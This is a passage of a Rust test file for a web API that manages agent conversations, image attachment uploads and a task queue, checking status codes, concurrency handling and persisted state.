5812 assert_eq!(
5813 body["turns"].as_array().unwrap().len(),
5814 0,
5815 "opening takes no agent turn: there is nothing yet to answer"
5816 );
5817
5818 let also_opened = f.post("/api/talks", Some("{}")).await;
5820 assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5821
5822 let listed = f.get("/api/talks").await.json();
5823 assert_eq!(listed.as_array().unwrap().len(), 2);
5824 }
5825
5826 #[tokio::test]
5827 async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5828 let f = Fixture::start().await;
5829 let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5830 let queue = f.queue();
5831 let mut mine = Task::new(
5832 "rename the loader".to_owned(),
5833 "rename the loader".to_owned(),
5834 PathBuf::from("/repo/magi"),
5835 Source::Agent {
5836 run: talk_id.clone(),
5837 node: "chat".to_owned(),
5838 },
5839 );
5840 queue.put(&mut mine).expect("file the task");
5841 let mut theirs = Task::new(
5842 "unrelated".to_owned(),
5843 "unrelated".to_owned(),
5844 PathBuf::from("/repo/magi"),
5845 Source::Human,
5846 );
5847 queue.put(&mut theirs).expect("file the task");
5848
5849 let res = f.get(&format!("/api/talks/{talk_id}")).await;
5850 assert_eq!(res.status, 200, "{}", res.body);
5851 let body = res.json();
5852 assert_eq!(
5853 body["status"], "open",
5854 "filing a task does not close a talk"
5855 );
5856 let tasks = body["tasks"].as_array().expect("tasks array");
5857 assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5858 assert_eq!(tasks[0]["id"], mine.id);
5859 }
5860
5861 #[tokio::test]
5862 async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5863 let (_tmp, _repo, f) = talk_fixture().await;
5864 let id = f.post("/api/talks", None).await.json()["id"]
5865 .as_str()
5866 .expect("id")
5867 .to_owned();
5868
5869 let res = f
5870 .post(
5871 &format!("/api/talks/{id}/say"),
5872 Some(r#"{"text":"what does the queue module do?"}"#),
5873 )
5874 .await;
5875 assert_eq!(res.status, 202, "{}", res.body);
5876 let queued = res.json();
5877 let turns = queued["turns"].as_array().expect("turns array");
5878 assert_eq!(
5879 turns.len(),
5880 1,
5881 "the answer reflects only what is on disk the instant it is sent, \
5882 before the agent's turn - which can run for the whole of \
5883 `[graph] timeout_talk` - has a chance to land: {queued}"
5884 );
5885 assert_eq!(turns[0]["who"], "operator");
5886 assert_eq!(turns[0]["body"], "what does the queue module do?");
5887 assert_eq!(
5888 queued["thinking"], true,
5889 "the accepted response exposes the background turn claim: {queued}"
5890 );
5891
5892 let mut turns_after = 1;
5893 for _ in 0..SETTLE_STEPS {
5894 let detail = f.get(&format!("/api/talks/{id}")).await.json();
5895 turns_after = detail["turns"].as_array().expect("turns array").len();
5896 if turns_after == 2 {
5897 break;
5898 }
5899 tokio::time::sleep(Duration::from_millis(10)).await;
5900 }
5901 assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5902 }
5903
5904 #[tokio::test]
5931 async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
5932 let tmp = TempDir::new().expect("tempdir");
5933 let repo = tmp.path().join("repo");
5934 std::fs::create_dir_all(&repo).expect("repo dir");
5935 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5936 let home = TempDir::new().expect("temp home");
5937 let talks = Talks::at(home.path().join("talks"));
5938 let ui = Arc::new(
5939 Ui::new(
5940 Queue::at(home.path().join("queue")),
5941 Questions::at(home.path().join("questions")),
5942 talks.clone(),
5943 home.path().join("runs"),
5944 home.path().to_path_buf(),
5945 repo.clone(),
5946 )
5947 .with_worktrees_root(home.path().join("wt")),
5948 );
5949 let cfg = config_for(&repo).await.expect("discover config");
5950
5951 for delay in 0..40u32 {
5952 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5953 let id = talk.id.clone();
5954
5955 let handler = tokio::spawn(talk_say(
5956 State(Arc::clone(&ui)),
5957 Path(id.clone()),
5958 Ok(Json(NewTalkTurn {
5959 text: "what does the queue module do?".to_owned(),
5960 attachments: Vec::new(),
5961 })),
5962 ));
5963 tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
5964 handler.abort();
5965 let _ = handler.await;
5968
5969 let mut turns = 0;
5970 for _ in 0..SETTLE_STEPS {
5971 if let Ok(fresh) = talks.get(&id) {
5972 turns = fresh.turns.len();
5973 if turns != 1 {
5974 break;
5975 }
5976 }
5977 tokio::time::sleep(Duration::from_millis(10)).await;
5978 }
5979 assert_ne!(
5980 turns, 1,
5981 "delay {delay}: talk {id} recorded the operator's turn but \
5982 the agent never answered - the reply task was never \
5983 started after the handler future was dropped"
5984 );
5985 }
5986 }
5987
5988 #[tokio::test]
6033 async fn a_dropped_handler_future_after_queueing_still_drains_the_draft() {
6034 let tmp = TempDir::new().expect("tempdir");
6035 let repo = tmp.path().join("repo");
6036 std::fs::create_dir_all(&repo).expect("repo dir");
6037 std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
6038 let home = TempDir::new().expect("temp home");
6039 let talks = Talks::at(home.path().join("talks"));
6040 let ui = Arc::new(
6041 Ui::new(
6042 Queue::at(home.path().join("queue")),
6043 Questions::at(home.path().join("questions")),
6044 talks.clone(),
6045 home.path().join("runs"),
6046 home.path().to_path_buf(),
6047 repo.clone(),
6048 )
6049 .with_worktrees_root(home.path().join("wt")),
6050 );
6051 let cfg = config_for(&repo).await.expect("discover config");
6052
6053 for attempt in 0..3u32 {
6054 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
6055 let id = talk.id.clone();
6056 let turn_guard = ui
6059 .begin_talk_turn(&id)
6060 .expect("claim the turn")
6061 .expect("a fresh talk owes nobody a turn");
6062
6063 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
6064 let (release_tx, release_rx) = std::sync::mpsc::channel();
6065 ui.set_busy_queue_gate(BusyQueueGate {
6066 reached: reached_tx,
6067 release: release_rx,
6068 });
6069
6070 let handler = tokio::spawn(talk_say(
6071 State(Arc::clone(&ui)),
6072 Path(id.clone()),
6073 Ok(Json(NewTalkTurn {
6074 text: "what does the queue module do?".to_owned(),
6075 attachments: Vec::new(),
6076 })),
6077 ));
6078
6079 tokio::time::timeout(Duration::from_secs(5), reached_rx)
6084 .await
6085 .unwrap_or_else(|_| {
6086 panic!(
6087 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
6088 )
6089 })
6090 .expect("the busy branch dropped the gate without using it");
6091
6092 let running = talks.get(&id).expect("reload talk");
6099 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
6100
6101 handler.abort();
6105 let _ = handler.await;
6106
6107 let _ = release_tx.send(());
6113
6114 let mut fresh = talks.get(&id).expect("reload talk");
6117 for _ in 0..SETTLE_STEPS {
6118 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
6119 break;
6120 }
6121 tokio::time::sleep(Duration::from_millis(10)).await;
6122 fresh = talks.get(&id).expect("reload talk");
6123 }
6124 assert!(
6125 fresh.pending.is_empty() && fresh.turns.len() == 2,
6126 "attempt {attempt}: talk {id} left the operator's text queued \
6127 with no drainer - the reclaimed turn was dropped along with \
6128 the handler future (pending {:?}, {} turns)",
6129 fresh.pending,
6130 fresh.turns.len()
6131 );
6132 }
6133 }
6134
6135 #[tokio::test]
6136 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
6137 let (_tmp, _repo, f) = talk_fixture().await;
6138 let id = f.post("/api/talks", None).await.json()["id"]
6139 .as_str()
6140 .expect("id")
6141 .to_owned();
6142 let store = f.talks();
6143 let mut recovered = store.get(&id).expect("opened talk");
6144 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
6145 .expect("persist pending draft without a live turn");
6146
6147 let edited = f
6148 .post(
6149 &format!("/api/talks/{id}/pending/edit"),
6150 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
6151 )
6152 .await;
6153 assert_eq!(edited.status, 200, "{}", edited.body);
6154 assert!(edited.json()["thinking"].as_bool().unwrap());
6155
6156 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
6157 for _ in 0..SETTLE_STEPS {
6158 if detail["turns"].as_array().expect("turns").len() == 2 {
6159 break;
6160 }
6161 tokio::time::sleep(Duration::from_millis(10)).await;
6162 detail = f.get(&format!("/api/talks/{id}")).await.json();
6163 }
6164 let turns = detail["turns"].as_array().expect("turns");
6165 assert_eq!(
6166 turns.len(),
6167 2,
6168 "the recovered draft must run once: {detail}"
6169 );
6170 assert_eq!(turns[0]["body"], "corrected");
6171 assert_eq!(detail["pending"], "");
6172 }
6173
6174 #[tokio::test]
6175 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
6176 let tmp = TempDir::new().expect("tempdir");
6177 let repo = tmp.path().join("repo");
6178 std::fs::create_dir_all(&repo).expect("repo dir");
6179 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6180 let f = Fixture::with_repo(repo).await;
6181 let id = f.post("/api/talks", None).await.json()["id"]
6182 .as_str()
6183 .expect("id")
6184 .to_owned();
6185 let store = f.talks();
6186 let mut recovered = store.get(&id).expect("opened talk");
6187 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
6188 .expect("persist pending draft without a live turn");
6189
6190 let refused = f
6191 .post(
6192 &format!("/api/talks/{id}/say"),
6193 Some(r#"{"text":"new message"}"#),
6194 )
6195 .await;
6196 assert_eq!(refused.status, 409, "{}", refused.body);
6197 assert!(refused.body.contains("resume"), "{}", refused.body);
6198 let saved = store.get(&id).expect("draft remains after refusal");
6199 assert!(saved.turns.is_empty());
6200 assert_eq!(saved.pending, "saved before restart");
6201
6202 let say_path = format!("/api/talks/{id}/say");
6203 let (first, second) = tokio::join!(
6204 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
6205 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
6206 );
6207 assert_eq!(first.status, 409, "{}", first.body);
6208 assert_eq!(second.status, 409, "{}", second.body);
6209 let saved = store
6210 .get(&id)
6211 .expect("draft remains after concurrent refusals");
6212 assert!(saved.turns.is_empty());
6213 assert_eq!(saved.pending, "saved before restart");
6214
6215 let resumed = f
6216 .post(&format!("/api/talks/{id}/pending/resume"), None)
6217 .await;
6218 assert_eq!(resumed.status, 202, "{}", resumed.body);
6219 let duplicate = f
6220 .post(&format!("/api/talks/{id}/pending/resume"), None)
6221 .await;
6222 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
6223
6224 for _ in 0..SETTLE_STEPS {
6225 if store.get(&id).expect("talk").turns.len() == 2 {
6226 break;
6227 }
6228 tokio::time::sleep(Duration::from_millis(10)).await;
6229 }
6230 let finished = store.get(&id).expect("finished talk");
6231 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6232 assert_eq!(finished.turns[0].body, "saved before restart");
6233 assert!(finished.pending.is_empty());
6234 }
6235
6236 #[tokio::test]
6237 async fn an_image_only_recovered_draft_resumes_without_text() {
6238 let (_tmp, _repo, f) = talk_fixture().await;
6239 let id = f.post("/api/talks", None).await.json()["id"]
6240 .as_str()
6241 .expect("id")
6242 .to_owned();
6243 let uploaded = f
6244 .post_bytes(
6245 &format!("/api/talks/{id}/attachments"),
6246 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
6247 PNG_BYTES,
6248 )
6249 .await;
6250 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6251 let attachment = f
6252 .talks()
6253 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
6254 .expect("attachment metadata")
6255 .expect("stored attachment");
6256 let store = f.talks();
6257 let mut recovered = store.get(&id).expect("opened talk");
6258 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
6259
6260 let resumed = f
6261 .post(&format!("/api/talks/{id}/pending/resume"), None)
6262 .await;
6263 assert_eq!(resumed.status, 202, "{}", resumed.body);
6264 for _ in 0..SETTLE_STEPS {
6265 if store.get(&id).expect("talk").turns.len() == 2 {
6266 break;
6267 }
6268 tokio::time::sleep(Duration::from_millis(10)).await;
6269 }
6270 let finished = store.get(&id).expect("finished talk");
6271 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6272 assert!(finished.turns[0].body.is_empty());
6273 assert_eq!(finished.turns[0].attachments.len(), 1);
6274 assert!(finished.pending_attachments.is_empty());
6275 }
6276
6277 #[tokio::test]
6278 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
6279 let (_tmp, _repo, f) = talk_fixture().await;
6280 let id = f.post("/api/talks", None).await.json()["id"]
6281 .as_str()
6282 .expect("id")
6283 .to_owned();
6284 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6285 assert_eq!(closed.status, 200, "{}", closed.body);
6286 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6287 .expect("serialize closed talk");
6288 for (path, body) in [
6289 (format!("/api/talks/{id}/pending/resume"), None),
6290 (
6291 format!("/api/talks/{id}/pending/clear"),
6292 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
6293 ),
6294 (
6295 format!("/api/talks/{id}/pending/edit"),
6296 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
6297 ),
6298 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
6299 ] {
6300 let response = f.post(&path, body).await;
6301 assert_eq!(response.status, 409, "{}", response.body);
6302 }
6303 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6304 .expect("serialize closed talk");
6305 assert_eq!(
6306 after_clear, before_clear,
6307 "clear must not rewrite a closed talk"
6308 );
6309 }
6310
6311 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
6314
6315 #[tokio::test]
6316 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
6317 let tmp = TempDir::new().expect("tempdir");
6318 let repo = tmp.path().join("repo");
6319 std::fs::create_dir_all(&repo).expect("repo dir");
6320 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6321 let f = Fixture::with_repo(repo).await;
6322 let id_a = f.post("/api/talks", None).await.json()["id"]
6323 .as_str()
6324 .unwrap()
6325 .to_owned();
6326 let id_b = f.post("/api/talks", None).await.json()["id"]
6327 .as_str()
6328 .unwrap()
6329 .to_owned();
6330
6331 let a = f
6332 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
6333 .await;
6334 assert_eq!(a.status, 202, "{}", a.body);
6335 assert_eq!(a.json()["thinking"], true);
6336 let b = f
6337 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
6338 .await;
6339 assert_eq!(b.status, 202, "{}", b.body);
6340 assert_eq!(b.json()["thinking"], true);
6341
6342 let listed = f.get("/api/talks").await.json();
6343 for id in [&id_a, &id_b] {
6344 let view = listed
6345 .as_array()
6346 .unwrap()
6347 .iter()
6348 .find(|talk| talk["id"] == *id)
6349 .unwrap();
6350 assert_eq!(view["thinking"], true, "{listed}");
6351 }
6352 let repeated = f
6353 .post(
6354 &format!("/api/talks/{id_a}/say"),
6355 Some(r#"{"text":"again"}"#),
6356 )
6357 .await;
6358 assert_eq!(repeated.status, 202, "{}", repeated.body);
6359 assert_eq!(repeated.json()["pending"], "again");
6360 }
6361
6362 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6365
6366 #[tokio::test]
6367 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6368 let f = Fixture::start().await;
6369 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6370
6371 let res = f
6372 .post_bytes(
6373 &format!("/api/talks/{id}/attachments"),
6374 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6375 PNG_BYTES,
6376 )
6377 .await;
6378 assert_eq!(res.status, 201, "{}", res.body);
6379 let body = res.json();
6380 assert_eq!(body["name"], "shot.png");
6381 assert_eq!(body["mime"], "image/png");
6382 assert_eq!(body["bytes"], PNG_BYTES.len());
6383 let att_id = body["id"].as_str().expect("id").to_owned();
6384 assert_eq!(
6385 att_id.len(),
6386 32,
6387 "the id must never be a client-suppliable path: {att_id}"
6388 );
6389
6390 let got = f
6391 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6392 .await;
6393 assert_eq!(got.status, 200, "{}", got.body);
6394 assert_eq!(got.header("content-type"), Some("image/png"));
6395 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6396 assert_eq!(got.bytes, PNG_BYTES);
6397 }
6398
6399 #[tokio::test]
6400 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6401 let f = Fixture::start().await;
6402 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6403
6404 let svg = f
6407 .post_bytes(
6408 &format!("/api/talks/{id}/attachments"),
6409 &[("Content-Type", "image/svg+xml")],
6410 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6411 )
6412 .await;
6413 assert!(
6414 (400..500).contains(&svg.status),
6415 "svg must be refused: {} {}",
6416 svg.status,
6417 svg.body
6418 );
6419 assert!(svg.body.contains("SVG"), "{}", svg.body);
6420
6421 let text = f
6422 .post_bytes(
6423 &format!("/api/talks/{id}/attachments"),
6424 &[("Content-Type", "text/plain")],
6425 b"just some text",
6426 )
6427 .await;
6428 assert!(
6429 (400..500).contains(&text.status),
6430 "an unlisted type must be refused: {} {}",
6431 text.status,
6432 text.body
6433 );
6434
6435 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6438 let big = f
6439 .post_bytes(
6440 &format!("/api/talks/{id}/attachments"),
6441 &[("Content-Type", "image/png")],
6442 &oversized,
6443 )
6444 .await;
6445 assert_eq!(
6446 big.status,
6447 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6448 "{}",
6449 big.body
6450 );
6451 }
6452
6453 #[tokio::test]
6454 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6455 let f = Fixture::start().await;
6456 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6457
6458 let res = f
6461 .post_bytes(
6462 &format!("/api/talks/{id}/attachments"),
6463 &[("Content-Type", "image/png")],
6464 b"<html>not a picture</html>",
6465 )
6466 .await;
6467 assert!((400..500).contains(&res.status), "{}", res.body);
6468 }
6469
6470 #[tokio::test]
6471 async fn an_unknown_attachment_id_is_a_404() {
6472 let f = Fixture::start().await;
6473 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6474
6475 let res = f
6476 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6477 .await;
6478 assert_eq!(res.status, 404, "{}", res.body);
6479 }
6480
6481 #[tokio::test]
6482 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6483 let f = Fixture::start().await;
6484 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6485
6486 let uploaded = f
6487 .post_bytes(
6488 &format!("/api/talks/{id}/attachments"),
6489 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6490 PNG_BYTES,
6491 )
6492 .await;
6493 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6494 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6495
6496 let res = f
6497 .post(
6498 &format!("/api/talks/{id}/say"),
6499 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6500 )
6501 .await;
6502 assert_eq!(res.status, 202, "{}", res.body);
6503 let queued = res.json();
6504 let turns = queued["turns"].as_array().expect("turns array");
6505 assert_eq!(
6506 turns.len(),
6507 1,
6508 "an empty body with an attachment is still a turn: {queued}"
6509 );
6510 assert_eq!(turns[0]["who"], "operator");
6511 assert_eq!(turns[0]["body"], "");
6512 let atts = turns[0]["attachments"]
6513 .as_array()
6514 .expect("attachments array");
6515 assert_eq!(atts.len(), 1);
6516 assert_eq!(atts[0]["id"], att_id);
6517 assert_eq!(atts[0]["mime"], "image/png");
6518
6519 let on_disk = f.talks().get(&id).expect("get");
6522 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6523 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6524 }
6525
6526 #[tokio::test]
6527 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6528 let f = Fixture::start().await;
6529 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6530
6531 let res = f
6532 .post(
6533 &format!("/api/talks/{id}/say"),
6534 Some(&format!(
6535 r#"{{"text":"hi","attachments":["{}"]}}"#,
6536 "a".repeat(32)
6537 )),
6538 )
6539 .await;
6540 assert!((400..500).contains(&res.status), "{}", res.body);
6541 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6542
6543 let on_disk = f.talks().get(&id).expect("get");
6544 assert!(
6545 on_disk.turns.is_empty(),
6546 "a rejected attachment id must not partially record the turn: {:?}",
6547 on_disk.turns
6548 );
6549 }
6550
6551 #[tokio::test]
6552 async fn talk_close_makes_the_talk_refuse_further_turns() {
6553 let f = Fixture::start().await;
6554 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6555
6556 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6557 assert_eq!(closed.status, 200, "{}", closed.body);
6558 assert_eq!(closed.json()["status"], "closed");
6559
6560 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6562 assert_eq!(closed_again.status, 200);
6563 assert_eq!(closed_again.json()["status"], "closed");
6564
6565 let said = f
6566 .post(
6567 &format!("/api/talks/{id}/say"),
6568 Some(r#"{"text":"too late"}"#),
6569 )
6570 .await;
6571 assert_eq!(said.status, 409, "{}", said.body);
6572 }
6573
6574 #[tokio::test]
6575 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6576 let (_tmp, _repo, f) = talk_fixture().await;
6577 let id = f.post("/api/talks", None).await.json()["id"]
6578 .as_str()
6579 .expect("id")
6580 .to_owned();
6581 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6582 assert_eq!(closed.status, 200, "{}", closed.body);
6583
6584 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6585 assert_eq!(reopened.status, 200, "{}", reopened.body);
6586 assert_eq!(reopened.json()["status"], "open");
6587
6588 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6590 assert_eq!(reopened_again.status, 200);
6591 assert_eq!(reopened_again.json()["status"], "open");
6592
6593 let said = f
6594 .post(
6595 &format!("/api/talks/{id}/say"),
6596 Some(r#"{"text":"still there?"}"#),
6597 )
6598 .await;
6599 assert_eq!(
6600 said.status, 202,
6601 "a reopened talk accepts turns again: {}",
6602 said.body
6603 );
6604 }
6605
6606 #[tokio::test]
6607 async fn talk_reopen_on_an_unknown_id_is_404() {
6608 let f = Fixture::start().await;
6609 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6610 assert_eq!(res.status, 404, "{}", res.body);
6611 }
6612
6613 #[tokio::test]
6614 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6615 let f = Fixture::start().await;
6616 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6617
6618 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6619 assert_eq!(deleted.status, 204, "{}", deleted.body);
6620
6621 let after = f.get(&format!("/api/talks/{id}")).await;
6622 assert_eq!(after.status, 404, "{}", after.body);
6623
6624 let listed = f.get("/api/talks").await.json();
6625 assert!(
6626 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6627 "a deleted talk must not linger in the list: {listed}"
6628 );
6629 }
6630
6631 #[tokio::test]
6632 async fn talk_delete_on_an_unknown_id_is_404() {
6633 let f = Fixture::start().await;
6634 let res = f.delete("/api/talks/nonexistent-id").await;
6635 assert_eq!(res.status, 404, "{}", res.body);
6636 }
6637
6638 #[tokio::test]
6639 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6640 let f = Fixture::start().await;
6641 let queue = f.queue();
6642 let mut task = Task::new(
6643 "spent".to_owned(),
6644 "Try again".to_owned(),
6645 PathBuf::from("/repo/magi"),
6646 Source::Human,
6647 );
6648 task.start("20260902-140502-bbbb".to_owned());
6649 task.fail("agent gave up", 9);
6650 queue.put(&mut task).expect("file the task");
6651
6652 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6653 assert_eq!(held.status, 200);
6654 assert_eq!(held.json()["status_str"], "held");
6655
6656 let released = f
6657 .post(&format!("/api/queue/{}/release", task.id), None)
6658 .await;
6659 assert_eq!(released.status, 200);
6660 assert_eq!(released.json()["status_str"], "queued");
6661 assert_eq!(
6662 released.json()["attempts"],
6663 0,
6664 "release is a real second chance, not an instant re-hold"
6665 );
6666 assert_eq!(
6667 queue.get(&task.id).expect("reload").status,
6668 TaskStatus::Queued,
6669 "the change is on disk, not only in the reply"
6670 );
6671 assert!(
6672 !f.home
6673 .path()
6674 .join("queue")
6675 .join(format!("{}.lock", task.id))
6676 .exists(),
6677 "the claim the mutation took is released again"
6678 );
6679 }
6680
6681 #[tokio::test]
6682 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6683 let f = Fixture::start().await;
6684 let queue = f.queue();
6685 let mut task = Task::new(
6686 "busy".to_owned(),
6687 "Running right now".to_owned(),
6688 PathBuf::from("/repo/magi"),
6689 Source::Human,
6690 );
6691 queue.put(&mut task).expect("file the task");
6692 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6693
6694 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6695
6696 assert_eq!(res.status, 409);
6697 assert_eq!(
6698 queue.get(&task.id).expect("reload").status,
6699 TaskStatus::Queued,
6700 "the refused hold changed nothing"
6701 );
6702 }
6703
6704 #[tokio::test]
6705 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6706 let f = Fixture::start().await;
6707 let queue = f.queue();
6708 let mut task = Task::new(
6709 "waiting on the migration".to_owned(),
6710 "Do the thing".to_owned(),
6711 PathBuf::from("/repo/magi"),
6712 Source::Human,
6713 );
6714 queue.put(&mut task).expect("file the task");
6715
6716 let held = f
6717 .post(
6718 &format!("/api/queue/{}/hold", task.id),
6719 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6720 )
6721 .await;
6722 assert_eq!(held.status, 200, "{}", held.body);
6723 assert_eq!(held.json()["status_str"], "held");
6724 assert_eq!(
6725 held.json()["hold_reason"],
6726 "waiting for 20260101-000000-aaaa to land"
6727 );
6728
6729 let listed = f.get("/api/queue").await.json();
6730 assert_eq!(
6731 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6732 "the card reads the reason off the same list route"
6733 );
6734
6735 let mut plain = Task::new(
6738 "no reason given".to_owned(),
6739 "Do another thing".to_owned(),
6740 PathBuf::from("/repo/magi"),
6741 Source::Human,
6742 );
6743 queue.put(&mut plain).expect("file the task");
6744 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6745 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6746 assert!(held_plain.json()["hold_reason"].is_null());
6747
6748 let released = f
6749 .post(&format!("/api/queue/{}/release", task.id), None)
6750 .await;
6751 assert_eq!(released.status, 200);
6752 assert!(
6753 released.json()["hold_reason"].is_null(),
6754 "a release must clear the reason so the next hold does not inherit it"
6755 );
6756 }
6757
6758 #[tokio::test]
6759 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6760 let f = Fixture::start().await;
6761 let queue = f.queue();
6762 let mut older = Task::new(
6763 "filed first".to_owned(),
6764 "x".to_owned(),
6765 PathBuf::from("/repo/magi"),
6766 Source::Human,
6767 );
6768 older.id = "20260101-000001-aaaa".to_owned();
6769 let mut newer = Task::new(
6770 "filed second".to_owned(),
6771 "x".to_owned(),
6772 PathBuf::from("/repo/magi"),
6773 Source::Human,
6774 );
6775 newer.id = "20260101-000002-bbbb".to_owned();
6776 queue.put(&mut older).expect("file older");
6777 queue.put(&mut newer).expect("file newer");
6778
6779 let before = f.get("/api/queue").await.json();
6782 assert_eq!(before[0]["id"], newer.id);
6783 assert_eq!(before[1]["id"], older.id);
6784
6785 let raised = f
6789 .post(
6790 &format!("/api/queue/{}/priority", older.id),
6791 Some(r#"{"priority":10}"#),
6792 )
6793 .await;
6794 assert_eq!(raised.status, 200, "{}", raised.body);
6795 assert_eq!(raised.json()["priority"], 10);
6796
6797 let after = f.get("/api/queue").await.json();
6798 let names: Vec<&str> = after
6799 .as_array()
6800 .unwrap()
6801 .iter()
6802 .map(|t| t["id"].as_str().unwrap())
6803 .collect();
6804 assert_eq!(names[0], older.id, "the raised task now sorts first");
6808 }
6809
6810 #[tokio::test]
6811 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6812 let f = Fixture::start().await;
6813 let queue = f.queue();
6814 let mut task = Task::new(
6815 "in flight".to_owned(),
6816 "x".to_owned(),
6817 PathBuf::from("/repo/magi"),
6818 Source::Human,
6819 );
6820 task.start("20260902-140502-bbbb".to_owned());
6821 queue.put(&mut task).expect("file the task");
6822
6823 let res = f
6824 .post(
6825 &format!("/api/queue/{}/priority", task.id),
6826 Some(r#"{"priority":9}"#),
6827 )
6828 .await;
6829 assert_eq!(res.status, 400, "{}", res.body);
6830 assert!(
6831 res.json()["error"]
6832 .as_str()
6833 .is_some_and(|e| e.contains("running")),
6834 "{}",
6835 res.body
6836 );
6837 assert_eq!(
6838 queue.get(&task.id).expect("reload").priority,
6839 0,
6840 "the refused write must not partially apply"
6841 );
6842 }
6843
6844 #[tokio::test]
6845 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6846 let f = Fixture::start().await;
